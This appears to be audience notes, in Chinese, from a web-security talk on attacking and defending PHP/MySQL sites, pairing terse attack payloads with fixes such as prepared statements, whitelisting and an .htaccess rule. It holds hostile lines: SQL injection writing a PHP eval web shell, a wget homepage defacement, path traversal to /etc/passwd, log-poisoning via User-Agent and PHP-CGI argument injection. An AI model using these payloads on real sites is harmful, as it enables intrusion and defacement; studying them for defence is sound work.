[email protected]
[email protected]

干擾你作筆記 XD

blog.orange.tw/

我絕對能入侵你的網站 - 我的網站絕對不會被入侵

union select select 1,2,3

select 1.user(),3

select 1.username,password from ...

cmd5.com

into outfile '/var/www/a.php' lines terminated by '<?php eval($_POST["cmd"]); ?>'

cmd="wget ...." 改首頁

mysql - /**/, %09, %0D, %A0, ()

select 'foo' = select 0x666f6f

XSS 劫持 window.onload

xss -> login -> 改首頁

使用 Prepared Statements 修正 SQL Injection

mysql_real_escape_string() 必須要使用 UTF-8

XSS - 任何輸入、輸出值都不可信任

OWASP Cross Site Scripting Prevention Cheat Sheet www.owasp.org/index.php/...

https://www.owasp.org/in...

使用白名單, 而不是黑名單過濾.

$(phpinfo()}

"root ${eval($_POST[cmd])}";

@ eval

@ phpinfo

Double Quote Evaluation 設定檔使用 Single Quote 而非 Double Quote

\'

module=login, ./login.php%00

../../../etc/passwd%00

上傳圖片, access.log 先寫入, 再去 include access.log

/proc/self/environ

User-Agent: <?php@ phpinfo();?>

/proc/self/environ%00

Local File Inclusion

指定 module 白名單.

PHP-CGI argument injection

index.php?-s

php-cgi -s index.php

顯示 source code

index.php?-d+allow_url_include%3dOn ...

只能更新 php-cgi 版本, 將 .htaccess 把 - 過濾掉.

RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]

最後到底是怎麼進去的XD 完全沒有輸入點吧XD

Pichubaby: 應該是把網頁規則 rewrite 掉?

阿? .htaccess?

最後的 demo 細節就不揭露了，所以弄比較快

該不會問題是出在varnish上吧?